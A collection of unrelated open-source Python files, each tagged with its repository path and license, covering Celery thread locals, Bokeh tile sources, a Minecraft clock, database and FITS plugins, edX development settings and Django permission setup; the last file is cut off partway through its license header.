versionadded:: 0.6.1 """ local.__release_local__() class Local(object): __slots__ = ('__storage__', '__ident_func__') def __init__(self): object.__setattr__(self, '__storage__', {}) object.__setattr__(self, '__ident_func__', get_ident) def __iter__(self): return iter(items(self.__storage__)) def __call__(self, proxy): """Create a proxy for a name.""" return Proxy(self, proxy) def __release_local__(self): self.__storage__.pop(self.__ident_func__(), None) def __getattr__(self, name): try: return self.__storage__[self.__ident_func__()][name] except KeyError: raise AttributeError(name) def __setattr__(self, name, value): ident = self.__ident_func__() storage = self.__storage__ try: storage[ident][name] = value except KeyError: storage[ident] = {name: value} def __delattr__(self, name): try: del self.__storage__[self.__ident_func__()][name] except KeyError: raise AttributeError(name) class _LocalStack(object): """This class works similar to a :class:`Local` but keeps a stack of objects instead. This is best explained with an example:: >>> ls = LocalStack() >>> ls.push(42) >>> ls.top 42 >>> ls.push(23) >>> ls.top 23 >>> ls.pop() 23 >>> ls.top 42 They can be force released by using a :class:`LocalManager` or with the :func:`release_local` function but the correct way is to pop the item from the stack after using. When the stack is empty it will no longer be bound to the current context (and as such released). By calling the stack without arguments it will return a proxy that resolves to the topmost item on the stack. """ def __init__(self): self._local = Local() def __release_local__(self): self._local.__release_local__() def _get__ident_func__(self): return self._local.__ident_func__ def _set__ident_func__(self, value): object.__setattr__(self._local, '__ident_func__', value) __ident_func__ = property(_get__ident_func__, _set__ident_func__) del _get__ident_func__, _set__ident_func__ def __call__(self): def _lookup(): rv = self.top if rv is None: raise RuntimeError('object unbound') return rv return Proxy(_lookup) def push(self, obj): """Pushes a new item to the stack""" rv = getattr(self._local, 'stack', None) if rv is None: self._local.stack = rv = [] rv.append(obj) return rv def pop(self): """Remove the topmost item from the stack, will return the old value or `None` if the stack was already empty. """ stack = getattr(self._local, 'stack', None) if stack is None: return None elif len(stack) == 1: release_local(self._local) return stack[-1] else: return stack.pop() def __len__(self): stack = getattr(self._local, 'stack', None) return len(stack) if stack else 0 @property def stack(self): """get_current_worker_task uses this to find the original task that was executed by the worker.""" stack = getattr(self._local, 'stack', None) if stack is not None: return stack return [] @property def top(self): """The topmost item on the stack. If the stack is empty, `None` is returned. """ try: return self._local.stack[-1] except (AttributeError, IndexError): return None class LocalManager(object): """Local objects cannot manage themselves. For that you need a local manager. You can pass a local manager multiple locals or add them later by appending them to `manager.locals`. Everytime the manager cleans up it, will clean up all the data left in the locals for this context. The `ident_func` parameter can be added to override the default ident function for the wrapped locals. 
""" def __init__(self, locals=None, ident_func=None): if locals is None: self.locals = [] elif isinstance(locals, Local): self.locals = [locals] else: self.locals = list(locals) if ident_func is not None: self.ident_func = ident_func for local in self.locals: object.__setattr__(local, '__ident_func__', ident_func) else: self.ident_func = get_ident def get_ident(self): """Return the context identifier the local objects use internally for this context. You cannot override this method to change the behavior but use it to link other context local objects (such as SQLAlchemy's scoped sessions) to the Werkzeug locals.""" return self.ident_func() def cleanup(self): """Manually clean up the data in the locals for this context. Call this at the end of the request or use `make_middleware()`. """ for local in self.locals: release_local(local) def __repr__(self): return '<{0} storages: {1}>'.format( self.__class__.__name__, len(self.locals)) class _FastLocalStack(threading.local): def __init__(self): self.stack = [] self.push = self.stack.append self.pop = self.stack.pop @property def top(self): try: return self.stack[-1] except (AttributeError, IndexError): return None def __len__(self): return len(self.stack) if USE_FAST_LOCALS: # pragma: no cover LocalStack = _FastLocalStack else: # - See #706 # since each thread has its own greenlet we can just use those as # identifiers for the context. If greenlets are not available we # fall back to the current thread ident. LocalStack = _LocalStack # noqa
apache-2.0
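The docstrings in the Celery threads module above already sketch how Local and LocalStack behave; a self-contained version of those same checks, assuming a Celery 3.x install where celery.utils.threads is importable, could be:

# Context-local storage and stack, as documented in the module above (Celery 3.x assumed).
from celery.utils.threads import Local, LocalStack, release_local

loc = Local()
loc.foo = 42                   # stored under the current thread/greenlet ident
release_local(loc)             # drops this context's storage
assert not hasattr(loc, 'foo')

ls = LocalStack()
ls.push(42)
ls.push(23)
assert ls.top == 23
assert ls.pop() == 23
assert ls.top == 42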
smolix/incubator-mxnet
example/rcnn/rcnn/pycocotools/setup.py
41
1365
# Licensed to the Apache Software Foundation (ASF) under one # or more contributor license agreements. See the NOTICE file # distributed with this work for additional information # regarding copyright ownership. The ASF licenses this file # to you under the Apache License, Version 2.0 (the # "License"); you may not use this file except in compliance # with the License. You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, # software distributed under the License is distributed on an # "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY # KIND, either express or implied. See the License for the # specific language governing permissions and limitations # under the License. from distutils.core import setup from Cython.Build import cythonize from distutils.extension import Extension import numpy as np # To compile and install locally run "python setup.py build_ext --inplace" # To install library to Python site-packages run "python setup.py build_ext install" ext_modules = [ Extension( '_mask', sources=['maskApi.c', '_mask.pyx'], include_dirs=[np.get_include()], extra_compile_args=['-Wno-cpp', '-Wno-unused-function', '-std=c99'], ) ] setup(name='pycocotools', ext_modules=cythonize(ext_modules) )
apache-2.0
KasperPRasmussen/bokeh
bokeh/models/tiles.py
8
4095
from __future__ import absolute_import from ..model import Model from ..core.properties import Any, Dict, Float, String, Int, Bool, Override class TileSource(Model): """ A base class for all tile source types. ``TileSource`` is not generally useful to instantiate on its own. In general, tile sources are used as a required input for ``TileRenderer``. Subclasses should have these properties as well: x_origin_offset = Float y_origin_offset = Float initial_resolution = Float """ _args = ('url', 'tile_size', 'min_zoom', 'max_zoom', 'extra_url_vars') url = String("", help=""" tile service url (example: http://c.tile.openstreetmap.org/{Z}/{X}/{Y}.png) """) tile_size = Int(default=256, help=""" tile size in pixels (e.g. 256) """) min_zoom = Int(default=0, help=""" the minimum zoom level for the tile layer. This is the most "zoomed-out" level. """) max_zoom = Int(default=30, help=""" the maximum zoom level for the tile layer. This is the most "zoomed-in" level. """) extra_url_vars = Dict(String, Any, help=""" A dictionary that maps url variable template keys to values. These variables are useful for parts of tile urls which do not change from tile to tile (e.g. server host name, or layer name). """) attribution = String("", help=""" Data provider attribution content. This can include HTML content. """) x_origin_offset = Float(help=""" x offset in plot coordinates """) y_origin_offset = Float(help=""" y offset in plot coordinates """) initial_resolution = Float(help=""" resolution (plot_units / pixels) of minimum zoom level of tileset projection. None to auto-compute. """) class MercatorTileSource(TileSource): """``MercatorTileSource`` is not generally useful to instantiate on its own, but is the parent class of mercator tile services (e.g. ``WMTSTileSource``). """ _args = ('url', 'tile_size', 'min_zoom', 'max_zoom', 'x_origin_offset', 'y_origin_offset', 'extra_url_vars', 'initial_resolution') x_origin_offset = Override(default=20037508.34) y_origin_offset = Override(default=20037508.34) initial_resolution = Override(default=156543.03392804097) wrap_around = Bool(default=True, help=""" Enables continuous horizontal panning by wrapping the x-axis based on bounds of map. Note that axis coordinates are not wrapped. To toggle axis label visibility, use ``plot.axis.visible = False``. """) class TMSTileSource(MercatorTileSource): """ The TMSTileSource contains tile config info and provides urls for tiles based on a templated url e.g. ``http://your.tms.server.host/{Z}/{X}/{Y}.png``. The defining feature of TMS is the tile-origin in located at the bottom-left. The TMSTileSource can also be helpful in implementing tile renderers for custom tile sets, including non-spatial datasets. """ pass class WMTSTileSource(MercatorTileSource): """ The ``WMTSTileSource`` behaves much like ``TMSTileSource`` but has its tile-origin in the top-left. This is the most common used tile source for web mapping applications. Such companies as Google, MapQuest, Stamen, Esri, and OpenStreetMap provide service which use the WMTS specification e.g. ``http://c.tile.openstreetmap.org/{Z}/{X}/{Y}.png``. """ pass class QUADKEYTileSource(MercatorTileSource): """ The QUADKEYTileSource has the same tile origin as the WMTSTileSource but requests tiles using a `quadkey` argument instead of X, Y, Z e.g. 
``http://your.quadkey.tile.host/{Q}.png`` """ pass class BBoxTileSource(MercatorTileSource): """ The BBoxTileSource has the same default tile origin as the WMTSTileSource but requested tiles use a ``{XMIN}``, ``{YMIN}``, ``{XMAX}``, ``{YMAX}`` e.g. ``http://your.custom.tile.service?bbox={XMIN},{YMIN},{XMAX},{YMAX}``. """ use_latlon = Bool(default=False, help=""" Flag which indicates option to output {XMIN},{YMIN},{XMAX},{YMAX} in meters or latitude and longitude. """)
bsd-3-clause
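A short sketch of constructing one of the tile sources defined above; the OpenStreetMap URL template mirrors the one quoted in the docstrings, while the attribution string is an illustrative assumption:

# WMTS tile source using the {Z}/{X}/{Y} template shown in the docstrings above.
from bokeh.models.tiles import WMTSTileSource

osm = WMTSTileSource(
    url="http://c.tile.openstreetmap.org/{Z}/{X}/{Y}.png",
    attribution="Map tiles by OpenStreetMap contributors",   # attribution text assumed
)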
martinohanlon/minecraft-clock
minecraft-clock.py
1
5099
#www.stuffaboutcode.com #Raspberry Pi, Minecraft Analogue Clock #import the minecraft.py module from the minecraft directory import minecraft.minecraft as minecraft #import minecraft block module import minecraft.block as block #import time, so delays can be used import time #import datetime, to get the time! import datetime #import math so we can use cos and sin import math def drawCircle(mc, x0, y0, z, radius, blockType): f = 1 - radius ddf_x = 1 ddf_y = -2 * radius x = 0 y = radius mc.setBlock(x0, y0 + radius, z, blockType) mc.setBlock(x0, y0 - radius, z, blockType) mc.setBlock(x0 + radius, y0, z, blockType) mc.setBlock(x0 - radius, y0, z, blockType) while x < y: if f >= 0: y -= 1 ddf_y += 2 f += ddf_y x += 1 ddf_x += 2 f += ddf_x mc.setBlock(x0 + x, y0 + y, z, blockType) mc.setBlock(x0 - x, y0 + y, z, blockType) mc.setBlock(x0 + x, y0 - y, z, blockType) mc.setBlock(x0 - x, y0 - y, z, blockType) mc.setBlock(x0 + y, y0 + x, z, blockType) mc.setBlock(x0 - y, y0 + x, z, blockType) mc.setBlock(x0 + y, y0 - x, z, blockType) mc.setBlock(x0 - y, y0 - x, z, blockType) def drawLine(mc, x, y, z, x2, y2, blockType): """Brensenham line algorithm""" steep = 0 coords = [] dx = abs(x2 - x) if (x2 - x) > 0: sx = 1 else: sx = -1 dy = abs(y2 - y) if (y2 - y) > 0: sy = 1 else: sy = -1 if dy > dx: steep = 1 x,y = y,x dx,dy = dy,dx sx,sy = sy,sx d = (2 * dy) - dx for i in range(0,dx): if steep: mc.setBlock(y, x, z, blockType) else: mc.setBlock(x, y, z, blockType) while d >= 0: y = y + sy d = d - (2 * dx) x = x + sx d = d + (2 * dy) mc.setBlock(x2, y2, z, blockType) def findPointOnCircle(cx, cy, radius, angle): x = cx + math.sin(math.radians(angle)) * radius y = cy + math.cos(math.radians(angle)) * radius return((int(x + 0.5),int(y + 0.5))) def getAngleForHand(positionOnClock): angle = 360 * (positionOnClock / 60.0) return angle def drawHourHand(mc, clockCentre, hours, minutes, blockType): if (hours > 11): hours = hours - 12 angle = getAngleForHand(int((hours * 5) + (minutes * (5.0/60.0)))) hourHandEnd = findPointOnCircle(clockCentre.x, clockCentre.y, 10.0, angle) drawLine(mc, clockCentre.x, clockCentre.y, clockCentre.z - 1, hourHandEnd[0], hourHandEnd[1], blockType) def drawMinuteHand(mc, clockCentre, minutes, blockType): angle = getAngleForHand(minutes) minuteHandEnd = findPointOnCircle(clockCentre.x, clockCentre.y, 18.0, angle) drawLine(mc, clockCentre.x, clockCentre.y, clockCentre.z, minuteHandEnd[0], minuteHandEnd[1], blockType) def drawSecondHand(mc, clockCentre, seconds, blockType): angle = getAngleForHand(seconds) secondHandEnd = findPointOnCircle(clockCentre.x, clockCentre.y, 20.0, angle) drawLine(mc, clockCentre.x, clockCentre.y, clockCentre.z + 1, secondHandEnd[0], secondHandEnd[1], blockType) def drawClock(mc, clockCentre, radius, time): blockType = block.DIAMOND_BLOCK #draw the circle drawCircle(mc, clockCentre.x, clockCentre.y, clockCentre.z, radius, blockType) #draw hour hand drawHourHand(mc, clockCentre, time.hour, time.minute, block.DIRT) #draw minute hand drawMinuteHand(mc, clockCentre, time.minute, block.STONE) #draw second hand drawSecondHand(mc, clockCentre, time.second, block.WOOD_PLANKS) def updateTime(mc, clockCentre, lastTime, time): #draw hour and minute hand if (lastTime.minute != time.minute): #clear hour hand drawHourHand(mc, clockCentre, lastTime.hour, lastTime.minute, block.AIR) #new hour hand drawHourHand(mc, clockCentre, time.hour, time.minute, block.DIRT) #clear hand drawMinuteHand(mc, clockCentre, lastTime.minute, block.AIR) #new hand drawMinuteHand(mc, clockCentre, 
time.minute, block.STONE) #draw second hand if (lastTime.second != time.second): #clear hand drawSecondHand(mc, clockCentre, lastTime.second, block.AIR) #new hand drawSecondHand(mc, clockCentre, time.second, block.WOOD_PLANKS) if __name__ == "__main__": clockCentre = minecraft.Vec3(0, 30, 0) radius = 20 print "STARTED" time.sleep(5) #Connect to minecraft by creating the minecraft object # - minecraft needs to be running and in a game mc = minecraft.Minecraft.create() #Post a message to the minecraft chat window mc.postToChat("Hi, Minecraft Analogue Clock, www.stuffaboutcode.com") time.sleep(2) lastTime = datetime.datetime.now() drawClock(mc, clockCentre, radius, lastTime) try: while True: nowTime = datetime.datetime.now() updateTime(mc, clockCentre, lastTime, nowTime) lastTime = nowTime time.sleep(0.5) except KeyboardInterrupt: print "stopped"
mit
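The clock script above positions its hands with findPointOnCircle, which turns a 0-60 clock position into an angle and then into x/y offsets from the centre; a standalone check of that arithmetic, with no Minecraft connection required, might look like:

# Re-implementation of the hand geometry above, runnable without Minecraft.
import math

def find_point_on_circle(cx, cy, radius, angle):
    x = cx + math.sin(math.radians(angle)) * radius
    y = cy + math.cos(math.radians(angle)) * radius
    return (int(x + 0.5), int(y + 0.5))

angle = 360 * (15 / 60.0)                           # 15 minutes -> 90 degrees
print(find_point_on_circle(0, 30, 18.0, angle))     # (18, 30): the minute hand points "east" of the centre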
foss-transportationmodeling/rettina-server
flask/local/lib/python2.7/site-packages/sqlalchemy/dialects/mssql/adodbapi.py
80
2493
# mssql/adodbapi.py # Copyright (C) 2005-2015 the SQLAlchemy authors and contributors # <see AUTHORS file> # # This module is part of SQLAlchemy and is released under # the MIT License: http://www.opensource.org/licenses/mit-license.php """ .. dialect:: mssql+adodbapi :name: adodbapi :dbapi: adodbapi :connectstring: mssql+adodbapi://<username>:<password>@<dsnname> :url: http://adodbapi.sourceforge.net/ .. note:: The adodbapi dialect is not implemented SQLAlchemy versions 0.6 and above at this time. """ import datetime from sqlalchemy import types as sqltypes, util from sqlalchemy.dialects.mssql.base import MSDateTime, MSDialect import sys class MSDateTime_adodbapi(MSDateTime): def result_processor(self, dialect, coltype): def process(value): # adodbapi will return datetimes with empty time # values as datetime.date() objects. # Promote them back to full datetime.datetime() if type(value) is datetime.date: return datetime.datetime(value.year, value.month, value.day) return value return process class MSDialect_adodbapi(MSDialect): supports_sane_rowcount = True supports_sane_multi_rowcount = True supports_unicode = sys.maxunicode == 65535 supports_unicode_statements = True driver = 'adodbapi' @classmethod def import_dbapi(cls): import adodbapi as module return module colspecs = util.update_copy( MSDialect.colspecs, { sqltypes.DateTime: MSDateTime_adodbapi } ) def create_connect_args(self, url): keys = url.query connectors = ["Provider=SQLOLEDB"] if 'port' in keys: connectors.append("Data Source=%s, %s" % (keys.get("host"), keys.get("port"))) else: connectors.append("Data Source=%s" % keys.get("host")) connectors.append("Initial Catalog=%s" % keys.get("database")) user = keys.get("user") if user: connectors.append("User Id=%s" % user) connectors.append("Password=%s" % keys.get("password", "")) else: connectors.append("Integrated Security=SSPI") return [[";".join(connectors)], {}] def is_disconnect(self, e, connection, cursor): return isinstance(e, self.dbapi.adodbapi.DatabaseError) and \ "'connection failure'" in str(e) dialect = MSDialect_adodbapi
apache-2.0
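Per the dialect docstring above, the connect string takes the form mssql+adodbapi://<username>:<password>@<dsnname>; a hedged sketch of creating an engine with it follows, noting that the credentials and DSN are placeholders and that the docstring itself says the dialect is not implemented for SQLAlchemy 0.6 and above:

# Placeholder credentials and DSN; requires the adodbapi DBAPI to be installed.
from sqlalchemy import create_engine

engine = create_engine("mssql+adodbapi://scott:tiger@mydsn")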
okanasik/JdeRobot
src/drivers/MAVLinkServer/MAVProxy/modules/mavproxy_smartcamera/sc_config.py
4
5131
""" SmartCameraConfig class : handles config for the smart_camera project smart_camera.cnf file is created in the local directory other classes or files wishing to use this class should add import sc_config """ from os.path import expanduser import ConfigParser class SmartCameraConfig(object): def __init__(self): # default config file self.config_file = expanduser("~/smart_camera.cnf") # print config file location print ("config file: %s" % self.config_file) # create the global parser object self.parser = ConfigParser.SafeConfigParser() # read the config file into memory self.read() # read - reads the contents of the file into the dictionary in RAM def read(self): try: self.parser.read(self.config_file) except IOError as e: print ('Error {0} reading config file: {1}: '.format(e.errno, e.strerror)) return # save - saves the config to disk def save(self): try: with open(self.config_file, 'wb') as configfile: self.parser.write(configfile) except IOError as e: print ('Error {0} writing config file: {1}: '.format(e.errno, e.strerror)) return # check_section - ensures the section exists, creates it if not def check_section(self, section): if not self.parser.has_section(section): self.parser.add_section(section) return # get_boolean - returns the boolean found in the specified section/option or the default if not found def get_boolean(self, section, option, default): try: return self.parser.getboolean(section, option) except ConfigParser.Error: return default # set_boolean - sets the boolean to the specified section/option def set_boolean(self, section, option, new_value): self.check_section(section) self.parser.set(section, option, str(bool(new_value))) return # get_integer - returns the integer found in the specified section/option or the default if not found def get_integer(self, section, option, default): try: return self.parser.getint(section, option) except ConfigParser.Error: return default # set_integer - sets the integer to the specified section/option def set_integer(self, section, option, new_value): self.check_section(section) self.parser.set(section, option, str(int(new_value))) return # get_float - returns the float found in the specified section/option or the default if not found def get_float(self, section, option, default): try: return self.parser.getfloat(section, option) except ConfigParser.Error: return default # set_float - sets the float to the specified section/option def set_float(self, section, option, new_value): self.check_section(section) self.parser.set(section, option, str(float(new_value))) return # get_string - returns the string found in the specified section/option or the default if not found def get_string(self, section, option, default): try: return self.parser.get(section, option) except ConfigParser.Error: return default # set_string - sets the string to the specified section/option def set_string(self, section, option, new_value): self.check_section(section) self.parser.set(section, option, str(new_value)) return # main - tests SmartCameraConfig class def main(self): # print welcome message print ("SmartCameraConfig v1.0 test") print ("config file: %s" % self.config_file) # write and read a boolean section = 'Test_Section1' option = 'Test_boolean' print ("Writing %s/%s = True" % (section,option)) self.set_boolean(section,option,True) print ("Read %s/%s : %s" % (section, option, self.get_boolean(section, option, False))) # write and read an integer section = 'Test_Section1' option = 'Test_integer' print ("Writing %s/%s = 11" % (section,option)) 
self.set_integer(section,option,11) print ("Read %s/%s : %s" % (section, option, self.get_integer(section, option, 99))) # write and read a float section = 'Test_Section1' option = 'Test_float' print ("Writing %s/%s = 12.345" % (section,option)) self.set_float(section,option,12.345) print ("Read %s/%s : %s" % (section, option, self.get_float(section, option, 0.01))) # read an undefined number to get back the default section = 'Test_Section2' option = 'test_default' print ("Read %s/%s : %s" % (section, option, self.get_float(section, option, 21.21))) # save the config file self.save() return # declare global config object config = SmartCameraConfig() # run the main routine if this is file is called from the command line if __name__ == "__main__": config.main()
gpl-3.0
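The main() self-test above already exercises every getter and setter; a smaller usage sketch, relying on the module-level config object and following the docstring's advice to simply import sc_config (the 'camera'/'width' section and option names are illustrative):

# Reads (or creates) ~/smart_camera.cnf through the module-level config object.
import sc_config

width = sc_config.config.get_integer('camera', 'width', 640)   # 640 returned if unset
sc_config.config.set_integer('camera', 'width', width)
sc_config.config.save()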
cselis86/edx-platform
lms/envs/devstack.py
6
4593
""" Specific overrides to the base prod settings to make development easier. """ from .aws import * # pylint: disable=wildcard-import, unused-wildcard-import # Don't use S3 in devstack, fall back to filesystem del DEFAULT_FILE_STORAGE MEDIA_ROOT = "/edx/var/edxapp/uploads" DEBUG = True USE_I18N = True TEMPLATE_DEBUG = True SITE_NAME = 'localhost:8000' # By default don't use a worker, execute tasks as if they were local functions CELERY_ALWAYS_EAGER = True ################################ LOGGERS ###################################### import logging # Disable noisy loggers for pkg_name in ['track.contexts', 'track.middleware', 'dd.dogapi']: logging.getLogger(pkg_name).setLevel(logging.CRITICAL) ################################ EMAIL ######################################## EMAIL_BACKEND = 'django.core.mail.backends.console.EmailBackend' FEATURES['ENABLE_INSTRUCTOR_EMAIL'] = True # Enable email for all Studio courses FEATURES['REQUIRE_COURSE_EMAIL_AUTH'] = False # Give all courses email (don't require django-admin perms) ########################## ANALYTICS TESTING ######################## ANALYTICS_SERVER_URL = "http://127.0.0.1:9000/" ANALYTICS_API_KEY = "" # Set this to the dashboard URL in order to display the link from the # dashboard to the Analytics Dashboard. ANALYTICS_DASHBOARD_URL = None ################################ DEBUG TOOLBAR ################################ INSTALLED_APPS += ('debug_toolbar', 'debug_toolbar_mongo') MIDDLEWARE_CLASSES += ( 'django_comment_client.utils.QueryCountDebugMiddleware', 'debug_toolbar.middleware.DebugToolbarMiddleware', ) INTERNAL_IPS = ('127.0.0.1',) DEBUG_TOOLBAR_PANELS = ( 'debug_toolbar.panels.versions.VersionsPanel', 'debug_toolbar.panels.timer.TimerPanel', 'debug_toolbar.panels.settings.SettingsPanel', 'debug_toolbar.panels.headers.HeadersPanel', 'debug_toolbar.panels.request.RequestPanel', 'debug_toolbar.panels.sql.SQLPanel', 'debug_toolbar.panels.signals.SignalsPanel', 'debug_toolbar.panels.logging.LoggingPanel', 'debug_toolbar_mongo.panel.MongoDebugPanel', 'debug_toolbar.panels.profiling.ProfilingPanel', ) DEBUG_TOOLBAR_CONFIG = { 'SHOW_TOOLBAR_CALLBACK': 'lms.envs.devstack.should_show_debug_toolbar' } def should_show_debug_toolbar(_): return True # We always want the toolbar on devstack regardless of IP, auth, etc. 
########################### PIPELINE ################################# PIPELINE_SASS_ARGUMENTS = '--debug-info --require {proj_dir}/static/sass/bourbon/lib/bourbon.rb'.format(proj_dir=PROJECT_ROOT) ########################### VERIFIED CERTIFICATES ################################# FEATURES['AUTOMATIC_VERIFY_STUDENT_IDENTITY_FOR_TESTING'] = True FEATURES['ENABLE_PAYMENT_FAKE'] = True CC_PROCESSOR_NAME = 'CyberSource2' CC_PROCESSOR = { 'CyberSource2': { "PURCHASE_ENDPOINT": '/shoppingcart/payment_fake/', "SECRET_KEY": 'abcd123', "ACCESS_KEY": 'abcd123', "PROFILE_ID": 'edx', } } ########################### External REST APIs ################################# FEATURES['ENABLE_OAUTH2_PROVIDER'] = True OAUTH_OIDC_ISSUER = 'http://127.0.0.1:8000/oauth2' FEATURES['ENABLE_MOBILE_REST_API'] = True FEATURES['ENABLE_VIDEO_ABSTRACTION_LAYER_API'] = True ########################## SECURITY ####################### FEATURES['ENFORCE_PASSWORD_POLICY'] = False FEATURES['ENABLE_MAX_FAILED_LOGIN_ATTEMPTS'] = False FEATURES['SQUELCH_PII_IN_LOGS'] = False FEATURES['PREVENT_CONCURRENT_LOGINS'] = False FEATURES['ADVANCED_SECURITY'] = False PASSWORD_MIN_LENGTH = None PASSWORD_COMPLEXITY = {} ########################### Milestones ################################# FEATURES['MILESTONES_APP'] = True ########################### Entrance Exams ################################# FEATURES['ENTRANCE_EXAMS'] = True ########################## Courseware Search ####################### FEATURES['ENABLE_COURSEWARE_SEARCH'] = True SEARCH_ENGINE = "search.elastic.ElasticSearchEngine" ########################## Certificates Web/HTML View ####################### FEATURES['CERTIFICATES_HTML_VIEW'] = True ##################################################################### # See if the developer has any local overrides. try: from .private import * # pylint: disable=import-error except ImportError: pass ##################################################################### # Lastly, run any migrations, if needed. MODULESTORE = convert_module_store_setting_if_needed(MODULESTORE) SECRET_KEY = '85920908f28904ed733fe576320db18cabd7b6cd'
agpl-3.0
youprofit/scikit-image
skimage/io/_plugins/fits_plugin.py
28
4735
__all__ = ['imread', 'imread_collection'] import skimage.io as io try: from astropy.io import fits as pyfits except ImportError: try: import pyfits except ImportError: raise ImportError( "PyFITS could not be found. Please refer to\n" "http://www.stsci.edu/resources/software_hardware/pyfits\n" "for further instructions.") def imread(fname, dtype=None): """Load an image from a FITS file. Parameters ---------- fname : string Image file name, e.g. ``test.fits``. dtype : dtype, optional For FITS, this argument is ignored because Stefan is planning on removing the dtype argument from imread anyway. Returns ------- img_array : ndarray Unlike plugins such as PIL, where different colour bands/channels are stored in the third dimension, FITS images are greyscale-only and can be N-dimensional, so an array of the native FITS dimensionality is returned, without colour channels. Currently if no image is found in the file, None will be returned Notes ----- Currently FITS ``imread()`` always returns the first image extension when given a Multi-Extension FITS file; use ``imread_collection()`` (which does lazy loading) to get all the extensions at once. """ hdulist = pyfits.open(fname) # Iterate over FITS image extensions, ignoring any other extension types # such as binary tables, and get the first image data array: img_array = None for hdu in hdulist: if isinstance(hdu, pyfits.ImageHDU) or \ isinstance(hdu, pyfits.PrimaryHDU): if hdu.data is not None: img_array = hdu.data break hdulist.close() return img_array def imread_collection(load_pattern, conserve_memory=True): """Load a collection of images from one or more FITS files Parameters ---------- load_pattern : str or list List of extensions to load. Filename globbing is currently unsupported. converve_memory : bool If True, never keep more than one in memory at a specific time. Otherwise, images will be cached once they are loaded. Returns ------- ic : ImageCollection Collection of images. """ intype = type(load_pattern) if intype is not list and intype is not str: raise TypeError("Input must be a filename or list of filenames") # Ensure we have a list, otherwise we'll end up iterating over the string: if intype is not list: load_pattern = [load_pattern] # Generate a list of filename/extension pairs by opening the list of # files and finding the image extensions in each one: ext_list = [] for filename in load_pattern: hdulist = pyfits.open(filename) for n, hdu in zip(range(len(hdulist)), hdulist): if isinstance(hdu, pyfits.ImageHDU) or \ isinstance(hdu, pyfits.PrimaryHDU): # Ignore (primary) header units with no data (use '.size' # rather than '.data' to avoid actually loading the image): try: data_size = hdu.size() except TypeError: # (size changed to int in PyFITS 3.1) data_size = hdu.size if data_size > 0: ext_list.append((filename, n)) hdulist.close() return io.ImageCollection(ext_list, load_func=FITSFactory, conserve_memory=conserve_memory) def FITSFactory(image_ext): """Load an image extension from a FITS file and return a NumPy array Parameters ---------- image_ext : tuple FITS extension to load, in the format ``(filename, ext_num)``. The FITS ``(extname, extver)`` format is unsupported, since this function is not called directly by the user and ``imread_collection()`` does the work of figuring out which extensions need loading. 
""" # Expect a length-2 tuple with a filename as the first element: if not isinstance(image_ext, tuple): raise TypeError("Expected a tuple") if len(image_ext) != 2: raise ValueError("Expected a tuple of length 2") filename = image_ext[0] extnum = image_ext[1] if type(filename) is not str or type(extnum) is not int: raise ValueError("Expected a (filename, extension) tuple") hdulist = pyfits.open(filename) data = hdulist[extnum].data hdulist.close() if data is None: raise RuntimeError( "Extension %d of %s has no data" % (extnum, filename)) return data
bsd-3-clause
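A brief sketch of calling the FITS plugin functions above directly; it assumes astropy (or the older PyFITS) is installed and that a file named test.fits exists, the filename being the one used in the imread docstring:

# Direct use of the plugin module; needs astropy or pyfits, plus a local test.fits.
from skimage.io._plugins import fits_plugin

img = fits_plugin.imread('test.fits')               # first image extension, or None
ic = fits_plugin.imread_collection(['test.fits'])   # lazy ImageCollection of all image HDUs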
nickmoline/feedsanitizer
django/contrib/auth/management/__init__.py
104
2973
""" Creates permissions for all installed apps that need permissions. """ from django.contrib.auth import models as auth_app from django.db.models import get_models, signals def _get_permission_codename(action, opts): return u'%s_%s' % (action, opts.object_name.lower()) def _get_all_permissions(opts): "Returns (codename, name) for all permissions in the given opts." perms = [] for action in ('add', 'change', 'delete'): perms.append((_get_permission_codename(action, opts), u'Can %s %s' % (action, opts.verbose_name_raw))) return perms + list(opts.permissions) def create_permissions(app, created_models, verbosity, **kwargs): from django.contrib.contenttypes.models import ContentType app_models = get_models(app) # This will hold the permissions we're looking for as # (content_type, (codename, name)) searched_perms = list() # The codenames and ctypes that should exist. ctypes = set() for klass in app_models: ctype = ContentType.objects.get_for_model(klass) ctypes.add(ctype) for perm in _get_all_permissions(klass._meta): searched_perms.append((ctype, perm)) # Find all the Permissions that have a context_type for a model we're # looking for. We don't need to check for codenames since we already have # a list of the ones we're going to create. all_perms = set() ctypes_pks = set(ct.pk for ct in ctypes) for ctype, codename in auth_app.Permission.objects.all().values_list( 'content_type', 'codename')[:1000000]: if ctype in ctypes_pks: all_perms.add((ctype, codename)) for ctype, (codename, name) in searched_perms: # If the permissions exists, move on. if (ctype.pk, codename) in all_perms: continue p = auth_app.Permission.objects.create( codename=codename, name=name, content_type=ctype ) if verbosity >= 2: print "Adding permission '%s'" % p def create_superuser(app, created_models, verbosity, **kwargs): from django.core.management import call_command if auth_app.User in created_models and kwargs.get('interactive', True): msg = ("\nYou just installed Django's auth system, which means you " "don't have any superusers defined.\nWould you like to create one " "now? (yes/no): ") confirm = raw_input(msg) while 1: if confirm not in ('yes', 'no'): confirm = raw_input('Please enter either "yes" or "no": ') continue if confirm == 'yes': call_command("createsuperuser", interactive=True) break signals.post_syncdb.connect(create_permissions, dispatch_uid = "django.contrib.auth.management.create_permissions") signals.post_syncdb.connect(create_superuser, sender=auth_app, dispatch_uid = "django.contrib.auth.management.create_superuser")
mit
iradul/phantomjs-clone
src/qt/qtwebkit/Tools/Scripts/webkitpy/tool/commands/suggestnominations_unittest.py
121
4444
# Copyright (C) 2011 Google Inc. All rights reserved. # Copyright (C) 2011 Code Aurora Forum. All rights reserved. # # Redistribution and use in source and binary forms, with or without # modification, are permitted provided that the following conditions are # met: # # * Redistributions of source code must retain the above copyright # notice, this list of conditions and the following disclaimer. # * Redistributions in binary form must reproduce the above # copyright notice, this list of conditions and the following disclaimer # in the documentation and/or other materials provided with the # distribution. # * Neither the name of Google Inc. nor the names of its # contributors may be used to endorse or promote products derived from # this software without specific prior written permission. # # THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS # "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT # LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR # A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT # OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, # SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT # 